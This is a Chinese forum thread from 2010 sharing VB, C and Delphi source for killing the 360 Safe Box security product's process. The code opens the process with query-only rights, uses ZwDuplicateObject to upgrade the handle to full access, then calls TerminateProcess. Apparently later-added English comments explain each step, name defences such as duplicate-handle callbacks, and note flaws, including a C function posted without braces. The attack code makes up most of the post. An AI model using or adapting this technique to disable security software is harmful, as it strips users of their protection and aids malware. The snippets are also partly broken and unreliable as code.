论坛: 菜鸟乐园 标题: 再次干掉360保险箱VB/VC/delphi源码 复制本贴地址    
作者: xiaosi2007 [xiaosi2007]    论坛用户   登录
Option Explicit 
' Win32 / native API imports used by the routines below.
' TerminateProcess ends the process behind hProcess; the handle must carry
' the PROCESS_TERMINATE right for the call to succeed.
Private Declare Function TerminateProcess Lib "kernel32" (ByVal hProcess As Long, ByVal uExitCode As Long) As Long 
' ZwDuplicateObject is the native (ntdll) handle-duplication call. It takes a
' source process/handle pair, a target process, a location that receives the
' new handle, the access mask requested for the new handle, handle attributes
' and option flags. All handles are declared as 32-bit Long here.
' Defender note: the access mask on a duplicated handle is requested
' separately from the access of the source handle, so process self-protection
' that filters only the open path does not see it. Kernel object callbacks
' (ObRegisterCallbacks) can register for OB_OPERATION_HANDLE_DUPLICATE as well
' as OB_OPERATION_HANDLE_CREATE to cover both paths.
Private Declare Function ZwDuplicateObject _ 
                  Lib "NTDLL.DLL" (ByVal SourceProcessHandle As Long, _ 
                              ByVal SourceHandle As Long, _ 
                              ByVal TargetProcessHandle As Long, _ 
                              ByRef TargetHandle As Long, _ 
                              ByVal DesiredAccess As Long, _ 
                              ByVal HandleAttributes As Long, _ 
                              ByVal Options As Long) As Long 
' OpenProcess returns a handle to the process with id dwProcessID, limited to
' the rights in dwDesiredAccess, or 0 on failure.
Private Declare Function OpenProcess Lib "kernel32.dll" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessID As Long) As Long 

' Opens process id p and returns a Long handle value, or 0 (the default
' return value) when OpenProcess fails.
' Sequence shown by the code:
'   1. OpenProcess with &H400 (PROCESS_QUERY_INFORMATION) only.
'   2. ZwDuplicateObject from the current process (-1 pseudo-handle) into the
'      current process, requesting &H1F0FFF (the pre-Vista PROCESS_ALL_ACCESS
'      value) with Options = 1 (DUPLICATE_CLOSE_SOURCE).
' The status returned in Rtn is stored but never checked, so the caller gets
' no indication of whether the duplication was granted or denied.
' Defender note: a low-right open of a security product's process followed by
' a same-process duplicate that asks for full access is the pattern to look
' for. Process-access telemetry (e.g. Sysmon event ID 10, ProcessAccess) is
' one place to look for the initial open; the rights upgrade is requested in
' the duplicate call, which is why protection has to filter duplication too.
Function FcOpenProcess&(p&) 
Dim ProcessHandle As Long 
Dim Rtn As Long 
ProcessHandle = OpenProcess(&H400, 0, p) 
If ProcessHandle <> 0 Then 
        Rtn = ZwDuplicateObject(-1, ProcessHandle, -1, VarPtr(ProcessHandle), &H1F0FFF, 0, 1) 
        FcOpenProcess = ProcessHandle 
End If 
End Function 
' Button handler: obtains a handle through FcOpenProcess and passes it to
' TerminateProcess with exit code 0.
' The process id 1884 is hard-coded; presumably it was the target's PID on
' the author's machine at the time of posting.
' The result of FcOpenProcess is not checked, so TerminateProcess is also
' called when the returned handle is 0.
Private Sub Command1_Click() 
Dim ProcessHandle As Long 
ProcessHandle = FcOpenProcess&(1884) 
TerminateProcess ProcessHandle, 0 
End Sub 
/////////////////////// 
/*
 * C variant of the same sequence: open the process dwProcessId with a
 * query-only right, duplicate that handle inside the current process while
 * requesting full access, then call TerminateProcess on the result.
 * As posted, the function body has no opening or closing brace, and the
 * _ZwDuplicateObject function-pointer typedef is not shown on the page.
 *
 * Defender note: the rights upgrade is requested in the duplicate call, not
 * in the open. Self-protection therefore needs to strip PROCESS_TERMINATE
 * (and other sensitive rights) on handle duplication as well as on handle
 * creation; ObRegisterCallbacks supports both operation types. Running
 * anti-malware services as protected processes (PPL) is a further
 * mitigation on Windows versions that support it.
 */
void KillProcess (ULONG dwProcessId) 

      /* ntdll.dll is already mapped in every Win32 process, so the module
         handle is looked up rather than loaded. */
      HMODULE hNTDLL = GetModuleHandle("ntdll.dll"); 
      HANDLE  hProcessHandle; 
       
      /* Resolve the native export at run time; the result is not checked
         for NULL before it is called below. */
      _ZwDuplicateObject ZwDuplicateObject = 
            (_ZwDuplicateObject) GetProcAddress (hNTDLL, "ZwDuplicateObject"); 

      // The process has to be opened with access 0x400 (PROCESS_QUERY_INFORMATION)
      hProcessHandle = OpenProcess(0x400, FALSE, dwProcessId); 
      if(hProcessHandle != NULL) 
      { 
            // Duplicate the handle: source and target process are both the
            // current process ((HANDLE)-1), requested access is 0x1F0FFF
            // (pre-Vista PROCESS_ALL_ACCESS), option 1 is DUPLICATE_CLOSE_SOURCE.
            // The returned NTSTATUS is discarded.
            ZwDuplicateObject((HANDLE)-1,(PHANDLE)hProcessHandle,(HANDLE)-1,&hProcessHandle,0x1F0FFF,0, 1); 
      } 

      /* Called unconditionally, including when OpenProcess returned NULL. */
      TerminateProcess(hProcessHandle, 0); 

////////////////////////////////////// 
既然VB VC 都有了  也就不差  delphi的了 
///////////////////// 
附上D源码 
///////////////////// 
// Static import of the native ZwDuplicateObject export from NTDLL.DLL.
// All seven parameters, including TargetHandle, are declared as by-value
// LongInt, so the caller has to pass the address of the receiving variable
// as an integer. The return value is the status code as a LongInt.
function ZwDuplicateObject( SourceProcessHandle,SourceHandle ,TargetProcessHandle ,TargetHandle,DesiredAccess ,HandleAttributes,Options: LongInt):LongInt stdcall; external ’NTDLL.DLL’ name ’ZwDuplicateObject’; 

// Delphi variant of FcOpenProcess: opens process id p with $400
// (PROCESS_QUERY_INFORMATION) and, when that succeeds, duplicates the handle
// within the current process (-1 pseudo-handle) requesting $1F0FFF
// (pre-Vista PROCESS_ALL_ACCESS) with option 1 (DUPLICATE_CLOSE_SOURCE).
// Returns the value left in ProcessHandle, or 0 when OpenProcess fails.
// The status stored in Rtn is never inspected.
// Defender note: the access upgrade happens in the duplicate call, so
// process protection must filter handle duplication as well as handle
// creation to keep sensitive rights away from untrusted callers.
Function FcOpenProcess(p:Longint):Longint; 
var 
Rtn,ProcessHandle:Longint; 
begin 
ProcessHandle := OpenProcess($400, False, p); 
result:=0; 
If ProcessHandle <> 0 Then 
begin 
        // The address of ProcessHandle is passed as an integer so the call
        // can write the new handle over the original one.
        Rtn := ZwDuplicateObject(-1, ProcessHandle, -1, Integer(@ProcessHandle), $1F0FFF, 0, 1); 
        result := ProcessHandle 
End; 
End; 

// Button handler: obtains a handle through FcOpenProcess and passes it to
// TerminateProcess with exit code 0.
// The process id 3440 is hard-coded; presumably it was the target's PID on
// the author's machine. The handle is not checked for 0 before use.
procedure TForm1.Button1Click(Sender: TObject); 
var 
  ProcessHandle :Longint; 
begin 
ProcessHandle := FcOpenProcess(3440); 
TerminateProcess( ProcessHandle, 0 ); 
end;



地主 发表时间: 10-07-16 17:49

回复: siyuan [xiaosi2007]   论坛用户   登录
感兴趣的人都去哪了,

估计最新版的失效~~~~~~

B1层 发表时间: 10-10-09 10:22

回复: bking [bking]   版主   登录
不搞这个了.  顶一个

B2层 发表时间: 10-10-19 13:22

回复: siyuan [xiaosi2007]   论坛用户   登录


B3层 发表时间: 10-10-27 13:06

回复: li4415 [li4415]   论坛用户   登录
有那么牛吗?怎么搞的?

B4层 发表时间: 10-10-31 17:26

回复: rui_888 [rui_888]   论坛用户   登录
看不懂


B5层 发表时间: 10-12-03 20:53

回复: liaogw123 [liaogw123]   论坛用户   登录
我刚学的,只看懂一些,有些就看不懂了。。。不过你太有才了额,,这你都弄。。

B6层 发表时间: 11-01-23 15:53
